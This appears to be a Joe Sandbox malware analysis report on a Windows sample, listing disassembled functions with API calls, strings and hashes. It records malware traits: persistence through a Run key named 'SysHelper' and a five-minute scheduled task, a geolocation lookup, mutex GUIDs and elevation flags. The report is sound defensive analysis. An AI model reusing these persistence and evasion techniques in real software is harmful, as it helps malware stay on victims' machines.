Instruction ID: 47e0c19b8578887139e054fffe8a2a78e2bc0fbac709e53d7fa348ea991322e2
Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction Fuzzy Hash: 7D315976AC0A256FDF21AB64DC10B6E379E9F14B24F250019ED06EB2C4DF748901CBA0

Function 00405D99 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00405DA5

Part of subcall function 00404D73: __getptd_noexit.LIBCMT ref: 00404D76
Part of subcall function 00404D73: __amsg_exit.LIBCMT ref: 00404D83

__amsg_exit.LIBCMT ref: 00405DC5
__lock.LIBCMT ref: 00405DD5
InterlockedDecrement.KERNEL32(?), ref: 00405DF2
InterlockedIncrement.KERNEL32(020F2C40), ref: 00405E1D

Memory Dump Source

Source File: 00000000.00000002.1751755141.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1751728020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751755141.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751850291.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751866891.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751889363.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 8c9547458fd7c424843e330023cdc540895f6a26820e5d3a19e3b59fdc0a9e85
Instruction ID: a786bc2395a33695c01f39912e35e9194cb072813b2b01bf5b096d5615f318c8
Opcode Fuzzy Hash: 8c9547458fd7c424843e330023cdc540895f6a26820e5d3a19e3b59fdc0a9e85
Instruction Fuzzy Hash: 9F018E31D01A1197C721AB25980A75F7A60FF01714F14443FE850B76D1CB3C6A828FDE

Function 004010AD Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 004010CB

Part of subcall function 00402742: __mtinitlocknum.LIBCMT ref: 00402758
Part of subcall function 00402742: __amsg_exit.LIBCMT ref: 00402764
Part of subcall function 00402742: EnterCriticalSection.KERNEL32(00402543,00402543,?,004034AD,00000004,004A95C8,0000000C,004065F7,0040102A,00402552,00000000,00000000,00000000,?,00404D25,00000001), ref: 0040276C

___sbh_find_block.LIBCMT ref: 004010D6
___sbh_free_block.LIBCMT ref: 004010E5
HeapFree.KERNEL32(00000000,0040102A,004A9540,0000000C,00402723,00000000,004A95A8,0000000C,0040275D,0040102A,00402543,?,004034AD,00000004,004A95C8,0000000C), ref: 00401115
GetLastError.KERNEL32(?,004034AD,00000004,004A95C8,0000000C,004065F7,0040102A,00402552,00000000,00000000,00000000,?,00404D25,00000001,00000214), ref: 00401126

Memory Dump Source

Source File: 00000000.00000002.1751755141.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1751728020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751755141.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751850291.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751866891.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751889363.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 588c8c0e739328054b6b1d81dd52dce8de64d9b0d652276143a2e915c3a22438
Instruction ID: e3ad2658be1029a6c764e3d4744d99799671117a589aa33a50f22843976d0029
Opcode Fuzzy Hash: 588c8c0e739328054b6b1d81dd52dce8de64d9b0d652276143a2e915c3a22438
Instruction Fuzzy Hash: 3A01A231C01211AADF246FB29C4AB5E3AA4AF05729F10413FF654BA1E1DBBC89418A5D

Function 021B2670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 021B26DB
_memset.LIBCMT ref: 021B2A30
_memset.LIBCMT ref: 021B2AC0

Strings

D, xrefs: 021B2AC8

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: _memset
String ID: D
API String ID: 2102423945-2746444292
Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction ID: d78536aa188c6d34edbb7445459d4e80f4e2d1360b0b7ac23f6605f80e155808
Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction Fuzzy Hash: 59E15D71D40219ABDF25DFA0CD89FEEB7B8BF04304F144169EA09E6190EB74AA49CF54

Function 021AD8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 021AD8EA

Strings

, xrefs: 021ADADB
(, xrefs: 021ADAE9
$, xrefs: 021ADAE2

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: _memset
String ID: $$$(
API String ID: 2102423945-3551151888
Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction ID: c9dc8c3b5e0cd817b26c04b5db3864ea0df04acffcb17f945dc633d5fc26ea33
Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction Fuzzy Hash: 5A91CD74C812089FEF21CFA0DC69BEEBBB5AF06304F244068D41577280DBB65A48CF65

Function 004A753B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(004BB098), ref: 004A7607
GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 004A7644

Strings

VirtualProtect, xrefs: 004A760D
, xrefs: 004A758D

Memory Dump Source

Source File: 00000000.00000002.1751755141.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1751728020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751755141.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751850291.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751866891.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751889363.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: $VirtualProtect
API String ID: 1646373207-947944765
Opcode ID: c7654210ef0568af384c7d2d1ae89fb6b1a96c87cdc3f7fb31b294fc344601fc
Instruction ID: 7911a0c501cc7c5b72b9ded86d1bfadf4d461cded8068154810029e3547306ad
Opcode Fuzzy Hash: c7654210ef0568af384c7d2d1ae89fb6b1a96c87cdc3f7fb31b294fc344601fc
Instruction Fuzzy Hash: 95314B15D5C3C0DDE7019BA8BC057223F91EB2BB14F54056ADA958F6B1D3FA0548836F

Function 021BA810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 021BA858
_memset.LIBCMT ref: 021BA869
_memset.LIBCMT ref: 021BA87A

Strings

p2Q, xrefs: 021BA882

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: _memset
String ID: p2Q
API String ID: 2102423945-1521255505
Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction ID: 7e458128ca77a2bbb1847da5f527bca951c9370bd13ecee319a4249432fa14eb
Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction Fuzzy Hash: D6F0C96C698750A9F7217750BC26B957E916B31B0CF104088E1182A2E1D3FA238CA79A

Function 021EFBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 021EFBF1

Part of subcall function 021D169C: std::exception::_Copy_str.LIBCMT ref: 021D16B5

__CxxThrowException@8.LIBCMT ref: 021EFC06

Strings

TeM, xrefs: 021EFBFB, 021EFBE7
TeM, xrefs: 021EFBFE

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
String ID: TeM$TeM
API String ID: 3662862379-3870166017
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: 6d7db4d3691598ec8adfaeebb52acf823960e291f7a374f7ea574ed101c846e5
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: A9D06779C4020CBBCB00EFA5D459CDDBBB9AA04344B008466A91897241EB74A3498FD4

Function 021AD0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON

Download Yara Rule

APIs

Part of subcall function 021C197D: __wfsopen.LIBCMT ref: 021C1988

_fgetws.LIBCMT ref: 021AD15C

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: __wfsopen_fgetws
String ID:
API String ID: 853134316-0
Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction ID: 2506c502236cd780040a699f1a2308a106cf297dedf6ca59b2269b2d3ed5a788
Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction Fuzzy Hash: 8A91E3B9D80719ABCF21DFA4DC947AFB7F5BF14304F24052AE815A3640E775AA04CBA1

Function 021AD540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON

Download Yara Rule

APIs

__except_handler4.MSVCRT ref: 021AD77E
_malloc.LIBCMT ref: 021AD7B2
_malloc.LIBCMT ref: 021AD7C1
_fprintf.LIBCMT ref: 021AD815

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:
API String ID: 1783060780-0
Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction ID: 0dcbbcdf217e42e9e8412094335d3cb17451d651c16bcadfb89f551883b1e31e
Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction Fuzzy Hash: D5A19EB4C40248EFEF11EFE4CC55BDEBB76AF25308F140028D50576291D7BA5A48CBA6

Function 021C2AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 021C2B2E
__read_nolock.LIBCMT ref: 021C2BFE
__filbuf.LIBCMT ref: 021C2C21
_memset.LIBCMT ref: 021C2C65

Part of subcall function 021C5BA8: __getptd_noexit.LIBCMT ref: 021C5BA8

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction ID: a8224c1f63b7cae2353bcbe4457a6e537e5a4f83ab869a20059ff1047a89e200
Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction Fuzzy Hash: FB519178A4030A9FDB398F79C88066EB7B6AF60324F34872DEC35962D0D7759951CB44

Function 0040818E Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004081C2
__isleadbyte_l.LIBCMT ref: 004081F6
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00408227
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?,?,?,00000000), ref: 00408295

Memory Dump Source

Source File: 00000000.00000002.1751755141.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1751728020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751755141.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751850291.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751866891.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751889363.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: de10e71cb0db39fb3c86d3bea37f8cc85f6418dccf30b4602a10169084c52059
Instruction ID: bcccdbddf6edb5e33cd8d9b62f485cae4394b5f7b34a4144a4775fce7ab85355
Opcode Fuzzy Hash: de10e71cb0db39fb3c86d3bea37f8cc85f6418dccf30b4602a10169084c52059
Instruction Fuzzy Hash: CA31BF31600245EFCB20DFA4CA849AA3BA5BF41350F1945BEE4A1AB2D1DB34DD41DB59

Function 021E1359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 021E137D

Part of subcall function 021E1A9D: __fltout2.LIBCMT ref: 021E1AC6

__cftog_l.LIBCMT ref: 021E13A3
__cftoe_l.LIBCMT ref: 021E13D5

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 77704c5c840a3ac07d1cdef570920187713166ce916c2fde81439434934494d8
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: 6701483248094ABBCF165E84DC01CEE3F63BB19365B498515FA6E58830D336C9B2AB81

Function 02267A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 02267A4B

Part of subcall function 02268140: ___BuildCatchObjectHelper.LIBCMT ref: 02268172
Part of subcall function 02268140: ___AdjustPointer.LIBCMT ref: 02268189

_UnwindNestedFrames.LIBCMT ref: 02267A62
___FrameUnwindToState.LIBCMT ref: 02267A74
CallCatchBlock.LIBCMT ref: 02267A98

Memory Dump Source

Source File: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21a0000_file.jbxd

Yara matches

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction ID: fc6b5c8ecac41a7e6e0ed2d253d35cec52b663d7aad0f6993432b0232be36c94
Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction Fuzzy Hash: A201D732010209BBDF12AF95DC08EEA7BAAEF48758F158114F91865124D776E9A1DFA0

Function 00406505 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00406511

Part of subcall function 00404D73: __getptd_noexit.LIBCMT ref: 00404D76
Part of subcall function 00404D73: __amsg_exit.LIBCMT ref: 00404D83

__getptd.LIBCMT ref: 00406528
__amsg_exit.LIBCMT ref: 00406536
__lock.LIBCMT ref: 00406546

Memory Dump Source

Source File: 00000000.00000002.1751755141.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1751728020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751755141.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751850291.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751866891.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1751889363.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: a03eb32cb70a6cb46d4868c1b96f2a616ac8865678845852469dfd5624f2b2f3
Instruction ID: 43108a7cdec2e78bfd7abe1ba0d6f54392799be5e27be97f5d84fb845fd98235
Opcode Fuzzy Hash: a03eb32cb70a6cb46d4868c1b96f2a616ac8865678845852469dfd5624f2b2f3
Instruction Fuzzy Hash: C1F09631D407109BD710BB79A806B4D7790AF00728F11417FE841B72D6CB7C5911CA9E

Analysis Process: file.exePID: 6956, Parent PID: 6708COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	32.1%
Total number of Nodes:	829
Total number of Limit Nodes:	23

Executed Functions

Function 00419F90 Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565COMMON

Download Yara Rule

APIs

Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6

GetCurrentProcess.KERNEL32 ref: 00419FC4
GetLastError.KERNEL32 ref: 00419FD2
SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
GetLastError.KERNEL32 ref: 00419FE4
GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,006EB3A0,?), ref: 0041A0BB
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
GetCommandLineW.KERNEL32(?,?), ref: 0041A161

Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C

Strings

D:\Windows\, xrefs: 0041AFF3
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 0041A8B6
D:\Program Files (x86)\Google\, xrefs: 0041B085
C:\Windows\, xrefs: 0041AE0F
--Task, xrefs: 0041A2CD
--Service, xrefs: 0041A30B
D:\Program Files\Google\, xrefs: 0041B0EE
--AutoStart, xrefs: 0041A2EC
C:\Program Files\Internet Explorer\, xrefs: 0041AF73
%username%, xrefs: 0041B283
list<T> too long, xrefs: 0041B669, 0041B673
runas, xrefs: 0041A6CE
D:\Program Files (x86)\Internet Explorer\, xrefs: 0041B062
IsTask, xrefs: 0041A1EE, 0041A299
C:\Program Files\Google\, xrefs: 0041AFB9
IsAutoStart, xrefs: 0041A1D0, 0041A273
I:\5d2860c89d774.jpg, xrefs: 0041B32F
x2Q, xrefs: 0041A856
IsNotAutoStart, xrefs: 0041A645
C:\Program Files (x86)\Internet Explorer\, xrefs: 0041AEA1
C:\Program Files\Mozilla Firefox\, xrefs: 0041AF2D
D:\Program Files\Mozilla Firefox\, xrefs: 0041B0A8
C:\Program Files (x86)\Google\, xrefs: 0041AEE7
F:\, xrefs: 0041B397
<, xrefs: 0041A67B
--Admin, xrefs: 0041A1B4, 0041A632
--ForNetRes, xrefs: 0041A22E
X1P, xrefs: 0041A485
IsNotTask, xrefs: 0041A654
D:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041B02E
7P, xrefs: 0041B164
C:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041AE5B
D:\Program Files\Internet Explorer\, xrefs: 0041B0CB
x*P, xrefs: 0041ACE4
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 0041A8A0

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
API String ID: 2957410896-3144399390
Opcode ID: 9b5c50d6294a18cf099b6c7e176b95353e3768e69417b8150bb4c582a319d2e0
Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
Opcode Fuzzy Hash: 9b5c50d6294a18cf099b6c7e176b95353e3768e69417b8150bb4c582a319d2e0
Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

Function 0040D240 Relevance: 58.5, APIs: 25, Strings: 8, Instructions: 702
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 0040D26C
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
VariantInit.OLEAUT32(?), ref: 0040D2F0
VariantInit.OLEAUT32(?), ref: 0040D309
VariantInit.OLEAUT32(?), ref: 0040D322
VariantInit.OLEAUT32(?), ref: 0040D33B
VariantClear.OLEAUT32(?), ref: 0040D397
VariantClear.OLEAUT32(?), ref: 0040D3A4
VariantClear.OLEAUT32(?), ref: 0040D3B1
VariantClear.OLEAUT32(?), ref: 0040D3C2
CoUninitialize.OLE32 ref: 0040D3D5

Strings

%Y-%m-%dT%H:%M:%S, xrefs: 0040D790
Author Name, xrefs: 0040D4C8
2030-05-02T08:00:00, xrefs: 0040D737
Trigger1, xrefs: 0040D6FA
--Task, xrefs: 0040D8DD
Time Trigger Task, xrefs: 0040D43C, 0040D973
RegisterTaskDefinition. Err: %X, xrefs: 0040DA11
PT5M, xrefs: 0040D5A1, 0040D66C

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
API String ID: 2496729271-1738591096
Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040CF4A
InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
InternetCloseHandle.WININET(00000000), ref: 0040CFDA
InternetCloseHandle.WININET(00000000), ref: 0040CFDD

Strings

Microsoft Internet Explorer, xrefs: 0040CF5A
"country_code":", xrefs: 0040CFE1
https://api.2ip.ua/geo.json, xrefs: 0040CF79

Memory Dump Source

Source File: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1765380462.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1765380462.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead_memset
String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
API String ID: 1485416377-2962370585
Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
_memset.LIBCMT ref: 00411D3B
RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
GetCommandLineW.KERNEL32 ref: 00411EB4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
